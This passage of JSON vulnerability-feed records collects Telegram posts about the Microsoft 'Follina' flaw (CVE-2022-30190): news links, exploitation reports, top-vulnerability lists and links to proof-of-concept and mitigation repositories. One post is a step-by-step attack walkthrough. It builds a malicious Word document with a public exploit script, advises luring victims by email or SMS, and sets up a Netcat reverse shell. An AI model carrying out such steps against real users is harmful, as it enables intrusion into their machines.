]\n\nhttps://github.com/NafisiAslH/KnowledgeSharing/tree/main/CyberSecurity/Web/CVEs/CVE-2022/CVE-2022-30190?fbclid=IwAR0UczaWjJNKWTnlvZHCXsWhABuae0kDRKx3hj-wo0LS1y8TZ32HR5w9t3w", "creation_timestamp": "2022-06-03T13:07:43.000000Z"}, {"uuid": "5460980a-2de9-4c2f-886c-cf8df6dfad2c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://t.me/crackcodes/1915", "content": "#Analytics\nTop 10 most exploited vulnerabilities in 2022\n\n1. CVE-2022-30190: MS Office \"Follina\"\n\n2. CVE-2021-44228: Apache Log4Shell\n\n3. CVE-2022-22965: Spring4Shell\n\n4. CVE-2022-1388: F5 BIG-IP\n\n5. CVE-2022-0609: Google Chrome zero-day\nhttps://blog.google/threat-analysis-group/countering-threats-north-korea\n6. CVE-2017-11882: Old but not forgotten - MS Office bug\n\n7. CVE-2022-41082, CVE-2022-41040: ProxyNotShell\n\n8. CVE-2022-27925, CVE-2022-41352: Zimbra Collaboration Suite bugs\n\n\n9. CVE-2022-26134: Atlassian Confluence RCE flaw  \n\n10. CVE-2022-30525: Zyxel RCE vulnerability", "creation_timestamp": "2022-12-21T16:27:48.000000Z"}, {"uuid": "c00590bf-d0b0-4bc9-8930-4547b9574389", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "exploited", "source": "https://t.me/professional_c_h/1745", "content": "\ud83d\udca0 Follina - Microsoft MSDTC Vulnerability\n\n \ud83d\udc49\ud83c\udffb Follina is a remote code execution vulnerability where MSDT is invoked using the URL protocol from a calling application such as Word.  An attacker who successfully exploited this vulnerability could run arbitrary code with the privileges of the calling application.  The attacker can then install programs, view, modify or delete data, or create new accounts in the context allowed by the user's rights.\n\n \ud83d\udc41 An attacker can access a user's privileges using any application or even a shell.  An attacker can install programs, view, modify, delete data, or create new accounts with user privileges.  Follina's CVE number is CVE-2022-30190.\n\n\n Exploring Follina\n\n git clone https://github.com/JohnHammond/msdt-follina\n cd msdt-follina\n python3 follina.py -i X.X.X.X\n\n \ud83d\udcac In the above command, X.X.X.X is our IP address.  This will create a malicious doc file that launches a listener for its HTML payload on port 8000. You can view the documents in the msdt-follina directory.\n\n \ud83d\udcda We need to send it to our target's Windows system.  This is where you can apply your SI to hook your target.  You can send it by mail or send a juicy SMS with a link to download a malicious DOC file.  We hosted it in our decentralized cloud storage.  (In order to use it externally, we need to use our external IP address and forward the required port).\n\n \ud83d\udc41\u200d\ud83d\udde8 Whenever our victim opens it and clicks \"Enable Editing\" in MS Word (for an older version of MS Office, this is not required, we can get them directly), we get a reverse connection to our Kali Linux, as in the screenshot  .\n\n \ud83d\udcbb But it can do much more if we create the payload with the following command, then we can even get a shell:\n\n python3 follina.py -r 7777\n\n \u2328\ufe0f In the above command we are using port 7777 to connect to the payload, here we can use any unused port.\n\n \ud83d\udc68\ud83c\udffb\u200d\ud83d\udcbb The above command will create a Netcat payload and start the listener, and it will also create a DOC file in the msdt-follina directory.  After our target clicked \"Enable Editing\", we got a shell on reconnect.\n\n \ud83d\udccc Now we can do everything that a user of the victim computer can do.  This vulnerability is unlikely to be fixed, at least in the past week.  Our article is inspired by our friend NetworkChuck's video on YouTube, we can watch his next video (we made small changes to avoid mistakes).", "creation_timestamp": "2022-09-19T18:29:16.000000Z"}, {"uuid": "32900791-2ae7-40f9-8ec9-bfdc90bf4eb3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "Telegram/HgWi9PhIzpFYcgYzXSCS4wMGhIJqav4sX4ysQ_39jTE3yw", "content": "", "creation_timestamp": "2022-12-08T15:32:35.000000Z"}, {"uuid": "9c7c4907-08df-46f0-b575-b82a2271f380", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://t.me/cibsecurity/43626", "content": "\u203c CVE-2022-30190 \u203c\n\nMicrosoft Windows Support Diagnostic Tool (MSDT) Remote Code Execution Vulnerability.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2022-06-02T00:24:57.000000Z"}, {"uuid": "bd322e21-7c68-47bc-a354-1d1028961fca", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "exploited", "source": "https://t.me/information_security_channel/47592", "content": "Chinese Threat Actors Exploiting 'Follina' Vulnerability\nhttps://www.securityweek.com/chinese-threat-actors-exploiting-follina-vulnerability\n\nThe Windows zero-day vulnerability identified as Follina and CVE-2022-30190 is being exploited in an increasing number of attacks, including by a Chinese APT group.\nread more (https://www.securityweek.com/chinese-threat-actors-exploiting-follina-vulnerability)", "creation_timestamp": "2022-06-01T12:55:45.000000Z"}, {"uuid": "e6051d57-6e6a-4230-aabe-31ee90585bfa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "exploited", "source": "https://t.me/theninjaway1337/1120", "content": "Russian hackers start targeting Ukraine with Follina exploits\n\nUkraine's Computer Emergency Response Team (CERT) is warning that the Russian hacking group Sandworm may be exploiting Follina, a remote code execution vulnerability in Microsoft Windows Support Diagnostic Tool (MSDT) currently tracked as CVE-2022-30190.\nThe security issue can be triggered by either\u00a0opening or selecting a specially crafted document\u00a0and threat actors have been exploiting it in attacks since at least\u00a0April 2022.\n\nhttps://www.bleepingcomputer.com/news/security/russian-hackers-start-targeting-ukraine-with-follina-exploits/", "creation_timestamp": "2022-06-16T05:24:42.000000Z"}, {"uuid": "7a0492ac-091c-478e-bfe4-065bfd9bb499", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "exploited", "source": "https://t.me/information_security_channel/47630", "content": "Threat Advisory: CVE-2022-30190 \u2018Follina\u2019 \u2013 Severe Zero-day Vulnerability discovered in MSDT\nhttps://blogs.quickheal.com/threat-advisory-cve-2022-30190-follina-severe-zero-day-vulnerability-discovered-in-msdt/", "creation_timestamp": "2022-06-03T16:22:14.000000Z"}, {"uuid": "6e1c8fe6-6d8c-44e5-a5e7-ded22c0838f9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "exploited", "source": "https://t.me/information_security_channel/47631", "content": "A Zero-day Remote Code Execution Vulnerability with high severity has been identified as CVE-2022-30190 \u201cFOLLINA\u201d in Microsoft Windows...\nThe post Threat Advisory: CVE-2022-30190 \u2018Follina\u2019 \u2013 Severe Zero-day Vulnerability discovered in MSDT (https://blogs.quickheal.com/threat-advisory-cve-2022-30190-follina-severe-zero-day-vulnerability-discovered-in-msdt/) appeared first on Quick Heal Blog | Latest computer security news, tips, and advice (https://blogs.quickheal.com/).", "creation_timestamp": "2022-06-03T16:22:14.000000Z"}, {"uuid": "fd672d46-a1da-4ef4-9a01-d1d7c78f81c5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "exploited", "source": "https://t.me/information_security_channel/47699", "content": "'Follina' Vulnerability Exploited to Deliver Qbot, AsyncRAT, Other Malware\nhttps://www.securityweek.com/follina-vulnerability-exploited-deliver-qbot-asyncrat-other-malware\n\nSeveral malware families are being delivered using the recently disclosed Windows vulnerability identified as Follina and CVE-2022-30190, which remains without an official patch.\nread more (https://www.securityweek.com/follina-vulnerability-exploited-deliver-qbot-asyncrat-other-malware)", "creation_timestamp": "2022-06-09T16:13:49.000000Z"}, {"uuid": "b5145431-b081-4df4-bf75-51125c02432b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "exploited", "source": "https://t.me/information_security_channel/47738", "content": "Windows Updates Patch Actively Exploited 'Follina' Vulnerability\nhttps://www.securityweek.com/windows-updates-patch-actively-exploited-follina-vulnerability\n\nMicrosoft has fixed roughly 50 vulnerabilities with its June 2022 Patch Tuesday updates, including the actively exploited flaw known as Follina and CVE-2022-30190.\nread more (https://www.securityweek.com/windows-updates-patch-actively-exploited-follina-vulnerability)", "creation_timestamp": "2022-06-14T23:24:43.000000Z"}, {"uuid": "eccd4c12-eff8-458a-864b-47b015fba7d6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/BlueRedTeam/2127", "content": "#CVE-2022\n\nMitigates the \\\"Folina\\\"-ZeroDay (CVE-2022-30190)\n\nhttps://github.com/derco0n/mitigate-folina\n\n@BlueRedTeam", "creation_timestamp": "2022-06-03T23:38:43.000000Z"}, {"uuid": "775c3ff8-355e-4ab9-8d4d-585b5fe13b17", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "exploited", "source": "https://t.me/thehackernews/3605", "content": "Cybercriminals are leveraging exploits for CVE-2021-40444 and CVE-2022-30190 to execute code through malicious Word files. Once opened, LokiBot malware is downloaded, logging keystrokes, capturing screenshots, and stealing data.  \n \nRead: https://thehackernews.com/2023/07/cybercriminals-exploit-microsoft-word.html", "creation_timestamp": "2023-07-17T11:34:30.000000Z"}, {"uuid": "a06dfbd2-4288-4e01-ae7c-1fdc86eb325b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/BlueRedTeam/2567", "content": "#CVE-2022\nProof-of-concept app to overwrite fonts on iOS using CVE-2022-46689.\nhttps://github.com/zhuowei/WDBFontOverwrite\n\nThis repo contains payload for the CVE-2022-36067\nhttps://github.com/Prathamrajgor/Exploit-For-CVE-2022-36067\n\nProof of concept for CVE-2022-30190 (Follina).\n\nhttps://github.com/winstxnhdw/CVE-2022-30190\n\n@BlueRedTeam", "creation_timestamp": "2023-01-21T16:19:17.000000Z"}, {"uuid": "c035a73c-211f-4455-b1ee-a4e2ff04b7d6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://t.me/BlueRedTeam/2128", "content": "#CVE-2022\n\nThe CVE-2022-30190-follina Workarounds Patch\n\nhttps://github.com/suegdu/CVE-2022-30190-Follina-Patch\n\n@BlueRedTeam", "creation_timestamp": "2022-06-03T23:41:22.000000Z"}, {"uuid": "aa42b911-131b-4908-9694-ad61329cf132", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "exploited", "source": "https://t.me/BlueRedTeam/2129", "content": "#CVE-2022\n\nCVE-2022-30190 | MS-MSDT Follina One Click\n\nhttps://github.com/AchocolatechipPancake/MS-MSDT-Office-RCE-Follina\n\n@BlueRedTeam", "creation_timestamp": "2022-06-04T00:11:27.000000Z"}, {"uuid": "24bb56c6-e1fc-4ae3-874c-419c77acd708", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "exploited", "source": "https://t.me/BlueRedTeam/2144", "content": "#CVE-2022\n\nExploit Microsoft Zero-Day Vulnerability Follina (CVE-2022-30190)\n\nhttps://github.com/Hrishikesh7665/Follina_Exploiter_CLI\n\n@BlueRedTeam", "creation_timestamp": "2022-06-10T08:50:50.000000Z"}, {"uuid": "65319266-d74a-4a19-9e18-fa6b17634f72", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/BlueRedTeam/2169", "content": "#CVE-2022\n\nThese are two Python scripts compiled to easily and quickly apply temporary protection against the CVE-2022-30190 vulnerability (Follina)\n\nhttps://github.com/SrCroqueta/CVE-2022-30190_Temporary_Fix\n\n@BlueRedTeam", "creation_timestamp": "2022-06-17T21:11:01.000000Z"}, {"uuid": "af48f052-65d4-47a6-b5ce-c64441c4aba4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/BlueRedTeam/2170", "content": "#CVE-2022\n\nThese are the source codes of the Python scripts to apply the temporary protection against the CVE-2022-30190 vulnerability (Follina)\n\nhttps://github.com/SrCroqueta/CVE-2022-30190_Temporary_Fix_Source_Code\n\n@BlueRedTeam", "creation_timestamp": "2022-06-23T22:53:37.000000Z"}, {"uuid": "ace34b7d-b44a-4437-be39-59d1eceed6de", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/CNArsenal/575", "content": "https://github.com/aminetitrofine/CVE-2022-30190\n#github", "creation_timestamp": "2023-05-17T06:06:06.000000Z"}, {"uuid": "e18d2113-dc5b-4cd3-ac68-555ff0333d42", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "exploited", "source": "https://t.me/BlueRedTeam/2122", "content": "#CVE-2022\n\nCVE-2022-30190 or \\\"Follina\\\" 0day proof of concept\n\nhttps://github.com/rayorole/CVE-2022-30190\n\n@BlueRedTeam", "creation_timestamp": "2022-06-03T10:46:04.000000Z"}, {"uuid": "1f2c5904-d3ec-4c16-b438-19aff43fdafc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/BlueRedTeam/2126", "content": "#CVE-2022\n\nA tool written in Go that scans files & directories for the Follina exploit (CVE-2022-30190)\n\nhttps://github.com/ErrorNoInternet/FollinaScanner\n\n@BlueRedTeam", "creation_timestamp": "2022-06-03T22:38:31.000000Z"}, {"uuid": "5b1a1056-2d58-4527-8cc9-de06f707c49e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/BlueRedTeam/2460", "content": "#CVE-2022\n\n[+] Implementation of CVE-2022-30190 in C\n\nhttps://github.com/mattjmillner/CVE-Smackdown\n\n\n\n\n[+] Exploit POC for CVE-2022-42055 for GL-iNet routers using firmware below 3.215\n\nhttps://github.com/gigaryte/cve-2022-42055\n\n\n@BlueRedTeam", "creation_timestamp": "2022-11-16T00:09:22.000000Z"}, {"uuid": "a0c89c4f-0c19-4979-a6ee-d26a8a5a5bb4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "exploited", "source": "https://t.me/haccking/8039", "content": "\u0422\u0440\u043e\u044f\u043d Qbot \u0443\u0436\u0435 \u0432\u0437\u044f\u043b \u043d\u0430 \u0432\u043e\u043e\u0440\u0443\u0436\u0435\u043d\u0438\u0435 \u0441\u0432\u0435\u0436\u0443\u044e \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0432 Windows MSDT\n\n\u0418\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438 \u043f\u0440\u0435\u0434\u0443\u043f\u0440\u0435\u0434\u0438\u043b\u0438, \u0447\u0442\u043e \u043c\u0430\u043b\u0432\u0430\u0440\u044c Qbot \u0443\u0436\u0435 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u0443\u0435\u0442 \u043d\u0435\u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u043d\u0443\u044e \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043d\u0443\u043b\u0435\u0432\u043e\u0433\u043e \u0434\u043d\u044f \u0432 Windows MSDT, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u043d\u043e\u0441\u0438\u0442 \u043d\u0430\u0437\u0432\u0430\u043d\u0438\u0435 Follina.\n\n\u041d\u0430\u043f\u043e\u043c\u043d\u044e, \u0447\u0442\u043e \u043e\u0431 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0438\u0438 Follina\u00a0\u0441\u0442\u0430\u043b\u043e \u0438\u0437\u0432\u0435\u0441\u0442\u043d\u043e\u00a0\u0432 \u043a\u043e\u043d\u0446\u0435 \u043c\u0430\u044f, \u0445\u043e\u0442\u044f \u043f\u0435\u0440\u0432\u044b\u0435 \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u043b\u0438 \u0431\u0430\u0433 \u0435\u0449\u0435 \u0432 \u0430\u043f\u0440\u0435\u043b\u0435 2022 \u0433\u043e\u0434\u0430, \u043d\u043e \u0442\u043e\u0433\u0434\u0430 \u0432 Microsoft \u043e\u0442\u043a\u0430\u0437\u0430\u043b\u0438\u0441\u044c \u043f\u0440\u0438\u0437\u043d\u0430\u0442\u044c \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u0443.\n\n\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043e\u0442\u0441\u043b\u0435\u0436\u0438\u0432\u0430\u0435\u0442\u0441\u044f \u043f\u043e\u0434 \u0438\u0434\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u043e\u0440\u043e\u043c\u00a0CVE-2022-30190, \u0438 \u0438\u0437\u0432\u0435\u0441\u0442\u043d\u043e, \u0447\u0442\u043e \u0435\u0435 \u043c\u043e\u0436\u043d\u043e \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u043e\u0432\u0430\u0442\u044c \u0434\u043b\u044f \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u043e\u0433\u043e \u043a\u043e\u0434\u0430 \u0447\u0435\u0440\u0435\u0437 \u043e\u0431\u044b\u0447\u043d\u043e\u0435 \u043e\u0442\u043a\u0440\u044b\u0442\u0438\u0435 \u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442\u0430 Word \u0438\u043b\u0438 \u043f\u0440\u0435\u0434\u0432\u0430\u0440\u0438\u0442\u0435\u043b\u044c\u043d\u044b\u0439 \u043f\u0440\u043e\u0441\u043c\u043e\u0442\u0440 \u0432 \u00ab\u041f\u0440\u043e\u0432\u043e\u0434\u043d\u0438\u043a\u0435\u00bb, \u043f\u0440\u0438\u0431\u0435\u0433\u0430\u044f \u043a \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044e \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0445 \u043a\u043e\u043c\u0430\u043d\u0434 PowerShell \u0447\u0435\u0440\u0435\u0437 Microsoft Diagnostic Tool (MSDT).\n\nLife hack\ud83d\udc48", "creation_timestamp": "2022-06-10T15:36:44.000000Z"}, {"uuid": "e404c09f-662d-4a94-94e5-749023113599", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://t.me/haccking/8128", "content": "#\u041e\u0431\u0443\u0447\u0435\u043d\u0438\u0435\n\u041d\u043e\u0432\u0430\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c Windows \u0434\u043b\u044f \u0443\u0434\u0430\u043b\u0451\u043d\u043d\u043e\u0433\u043e \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f \u043a\u043e\u043c\u0430\u043d\u0434 \u0447\u0435\u0440\u0435\u0437 \u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442.doc -CVE-2022-30190", "creation_timestamp": "2022-06-26T17:45:36.000000Z"}, {"uuid": "16a27f7f-73cc-47e6-93d6-a765be7e45a6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "exploited", "source": "Telegram/DWuFghBm9DmmJST6bI9NuBgV03ST9Bw0n5hEo3vRPn0EqYFb", "content": "", "creation_timestamp": "2022-06-26T02:15:48.000000Z"}, {"uuid": "28181135-aef1-464a-9aa0-65ca6075b57b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "exploited", "source": "https://t.me/arvin_club/5491", "content": "https://github.com/JMousqueton/PoC-CVE-2022-30190", "creation_timestamp": "2022-06-01T20:49:44.000000Z"}, {"uuid": "87dfe89e-f093-4691-8b96-26eb71786619", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/dragonforceio/739", "content": "P0c Patch / Fix 0day CVE-2022-30190 follina\n\nBy : impossible1337\nhttps://dragonforce.io/threads/0day-cve-2022-30190-follina-p0c-and-fix.13144/ \nForum Rasmi: https://dragonforce.io\nRadio Rasmi: https://radio.dragonforce.io\nFacebook: https://fb.me/dragonforcedotio\nTelegram: https://t.me/dragonforceio\nTwitter: https://twitter.com/dragonforceio\nYoutube: https://www.youtube.com/channel/UC9GycRXuy7-WMULPBkBp4Bw", "creation_timestamp": "2022-06-03T03:00:12.000000Z"}, {"uuid": "258f83bb-1699-47d7-9506-6e6484a52698", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "exploited", "source": "https://t.me/dragonforceio/740", "content": "https://dragonforce.io/threads/0day-cve-2022-30190-follina-p0c-and-fix.13144/", "creation_timestamp": "2022-06-03T03:01:35.000000Z"}, {"uuid": "2ecfd10c-7629-494e-9271-8b2bb2e9dac5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "Telegram/DCCFDjEFPe2QLNEHc05lpgLck17TBTfpWb2O-MdC7HDPV7nK", "content": "", "creation_timestamp": "2024-02-07T16:12:29.000000Z"}, {"uuid": "ac38b779-fea3-4e0b-be04-830a68121412", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "Telegram/mvPWI4un1-iOOZzGwGGDI0e0CA6ey2wKq3zB3-h9s87VgtZ8", "content": "", "creation_timestamp": "2024-02-07T16:16:30.000000Z"}, {"uuid": "4fe8b63e-8222-4521-b938-62e223ebde79", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "Telegram/7jzKcU8HVGZTkZZWwuUB25CufDvypfib6CwwM-UlhM1Jf1Mq", "content": "", "creation_timestamp": "2024-02-07T16:16:55.000000Z"}, {"uuid": "04e7299b-b9d8-4bfa-b1a4-4541328fcd60", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "exploited", "source": "https://t.me/CyberSecurityTechnologies/6105", "content": "#Threat_Research\nNew Microsoft Office Attack Vector via \"ms-msdt\" Protocol Scheme (CVE-2022-30190)\nhttps://isc.sans.edu/forums/diary/New+Microsoft+Office+Attack+Vector+via+msmsdt+Protocol+Scheme/28694\n]-> https://www.huntress.com/blog/microsoft-office-remote-code-execution-follina-msdt-bug\n]-> https://github.com/bytecaps/CVE-2022-30190", "creation_timestamp": "2022-06-01T02:13:30.000000Z"}, {"uuid": "4299621d-9db9-4d4b-9bda-24b584db7c5e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://t.me/CyberSecurityTechnologies/6326", "content": "#Analytics\nTop 10 Most Used Vulns of the Month (June 1-30)\n\nCVE-2022-30190 - Follina exploit\nCVE-2022-26134 - OGNL injection in Atlassian Confluence Server/Data Center\nCVE-2022-26809 - Weakness in a core Windows 7/10/Srv19/22 component (RPC)\nCVE-2022-30075 - TP-Link AX50 Auth RCE\nCVE-2022-23222 - Linux Kernel eBPF LPE\nCVE-2022-32275 - Grafana 8.4.3 allows reading files\nCVE-2022-26937 - Windows NFS NLM Portmap Stack Buffer Overflow\nCVE-2022-23088 - Heap Overflow in FreeBSD Wi-Fi Stack\nCVE-2022-31626 - RCE in PHP <=7.4.29\nCVE-2022-30333 - Dir Traversal in rar", "creation_timestamp": "2024-10-12T06:49:41.000000Z"}, {"uuid": "43a4ea76-9dba-494a-ab7c-1ead3595d236", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "exploited", "source": "https://t.me/CyberSecurityTechnologies/7395", "content": "#Analytics\nTop 10 most exploited vulnerabilities in 2022\n\n1. CVE-2022-30190: MS Office \"Follina\"\n2. CVE-2021-44228: Apache Log4Shell\n3. CVE-2022-22965: Spring4Shell\n4. CVE-2022-1388: F5 BIG-IP\n5. CVE-2022-0609: Google Chrome 0-day\n6. CVE-2017-11882: MS Office RCE\n7. CVE-2022-41082, CVE-2022-41040: ProxyNotShell\n8. CVE-2022-27925, CVE-2022-41352: Zimbra Collaboration Suite bugs\n9. CVE-2022-26134: Atlassian Confluence RCE\n10. CVE-2022-30525: Zyxel RCE vulnerability", "creation_timestamp": "2024-10-11T03:03:25.000000Z"}, {"uuid": "c6a27db5-b108-4e76-a04c-b1674f5d7b10", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "exploited", "source": "https://t.me/CyberSecurityTechnologies/6184", "content": "#Whitepaper\n\"TA570 Qakbot (Qbot) tries CVE-2022-30190 (Follina) exploit\", 09.06.2022.", "creation_timestamp": "2022-06-12T13:31:01.000000Z"}, {"uuid": "0002c1b2-11a5-43e9-9e53-5484fb4b9efb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/CyberSecurityTechnologies/6212", "content": "#Blue_Team_Techniques\nThese are two Python scripts compiled to quickly apply temporary protection against the CVE-2022-30190 vulnerability (Follina)\nhttps://github.com/SrCroqueta/CVE-2022-30190_Temporary_Fix\n]-> Source Codes:\nhttps://github.com/SrCroqueta/CVE-2022-30190_Temporary_Fix_Source_Code", "creation_timestamp": "2022-06-16T10:59:01.000000Z"}, {"uuid": "507d1b06-35bf-4394-abd4-cd97ebc18495", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "exploited", "source": "https://t.me/CyberSecurityTechnologies/6514", "content": "#Threat_Research\n1. LofyLife: malicious npm packages steal Discord tokens and bank card data\nhttps://securelist.com/lofylife-malicious-npm-packages/107014\n2. Follina exploit (CVE-2022-30190) fuels \"live-off-the-land\" attacks\nhttps://blog.reversinglabs.com/blog/threat-analysis-follina-exploit-powers-live-off-the-land-attacks", "creation_timestamp": "2022-08-02T11:49:18.000000Z"}, {"uuid": "c2a7aa9d-97c7-48ff-b81a-d5d2d3366971", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": 